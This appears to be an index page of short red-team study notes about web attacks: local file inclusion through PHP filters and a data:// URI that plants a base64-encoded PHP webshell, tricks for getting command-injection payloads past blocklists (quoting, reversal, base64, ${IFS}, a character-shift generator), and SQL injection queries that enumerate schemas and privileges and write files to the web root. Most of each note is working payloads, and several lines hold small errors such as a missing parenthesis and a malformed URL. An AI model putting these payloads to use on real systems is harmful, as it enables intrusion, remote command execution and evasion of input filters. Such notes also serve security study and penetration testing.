Using PHP filters in local file inclusion

🌱 [seed]
#php  #rce  #red-team  #webshel 

Imagine a PHP file where you can perform LFI such as

curl http://example.com/vuln.php?lang=en.php

With a badly configured server and app you can use PHP read filters to get the full content

curl http://example.com/vuln.php?lang=php://filter/read=convert.base64-encode/resource=en.php

You can get a webshell or RCE if allow_url_include is enabled

curl http://example.com?vuln.php?lang=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Cg==%3D%3D&cmd=whoami

The shell is <?php system($_GET['cmd'];

[Read more]

Techniques for bypassing blocklist words for command injections

🌱 [seed]
#command-injection  #shell 

Inserting noop characters

Quotes (even number of non-mixed) will be ignored by bash. $ c'a't becomes $ cat. Similar for $ c"a"t

Backslashing chars (other than \n etc, obs) will have no effect. $ c\at becomes $ cat.

Use the positional param character $ c$@at becomes $ cat

Manipulate the characters

$(rev<<<'tac') becomes cat. Experiment with other things like rot13.

Encode the command

$(base64 -d<<<"Y2F0Cg==") becomes cat

[Read more]

Techniques for bypassing blocklisted characters for command injections

🌱 [seed]
#command-injection  #hacking  #shell 

Whitespace

  • %0a: newline
  • %20: space
  • %09: tab
  • ${IFS}: Input Field Separators ↗️ (typically space, tab, newline)
  • bash bracket expansion: {ls,-la} turns into ls -la

Special characters

  • forward slash: echo ${PATH:0:1}
  • semicolon: echo ${LS_COLORS:10:1}
  • pipe: try using <<<

Shifting characters

This command will shift a letter one to the right echo $(tr '!-}' '"-~'<<<[). e.g. ~ becomes !.

shift_generator() {
  local shift=$1
  local char=$2
  local second_start=$((33 + shift))
  local second_end=$((33 + shift - 1))
  printf "echo \$(tr '\\!-~' '"
  printf '%b-~\\!-%b' "$(printf '\\%03o' $second_start)" "$(printf '\\%03o' $second_end)"
  printf "'<<<'%s')\n" "$char"
}

# usage
shift_generator 1 "~"

Tooling

For more advanced obfuscation you can consider tools such as:

[Read more]

Enumerating databases, tables, columns, and user privileges with SQL injection

🌿 [bud]
#red-team  #sql-injection 

Using a UNION injection we can find out about a (MySQL/MariaDB) structure.

Here are some minimal examples. Remember to determine the correct number of columns 🌿 and match that. Also clearly remember to add WHERE clauses to these to narrow down the search.

Databases

UNION SELECT SCHEMA_NAME from INFORMATION_SCHEMA.SCHEMATA;

Tables

UNION SELECT TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.TABLES;

Columns

UNION SELECT COLUMN_NAME,TABLE_NAME FROM INFORMATION_SCHEMA.COLUMNS;

Privileges

UNION SELECT GRANTEE, PRIVILEGE_TYPE FROM INFORMATION_SCHEMA.USER_PRIVILEGES

References

[Read more]

Writing files with MySQL

🌱 [seed]
#remote-shell  #sql-injection 

Prerequisites

This should not be enabled on any modern secure systems, but if it is, you can use it to create a remote shell.

secure_file_priv ↗️ can have the following values:

  • null: cannot write anywhere on system
  • "" (empty string): can write anywhere
  • "/path/to/dir": can write only to specified path
SHOW VARIABLES LIKE 'secure_file_priv';

You can get this by querying the information_schema using a union injection

UNION SELECT VARIABLE_NAME,VARIABLE_VALUE FROM INFORMATION_SCHEMA.GLOBAL_VARIABLES

Do it

SELECT "OOPS!" INTO OUTFILE "/var/www/html/poc.txt"

References

[Read more]

How to determine the number of columns for union SQL injection

🌿 [bud]
#red-team  #sql-injection 

A union injection causes additional rows to be added to the result set by using the UNION clause. To do this, we need to know the number of columns in the target result set.

There are two easy strategies for this. Using order by or union. Assume that the following is vulnerable:

SELECT * from users where username='$oops'

order by

In MySQL you can use numeric arguments for order by which you can use to infer the number of columns. Let $oops = "test' order by 1 -- then the query becomes:

[Read more]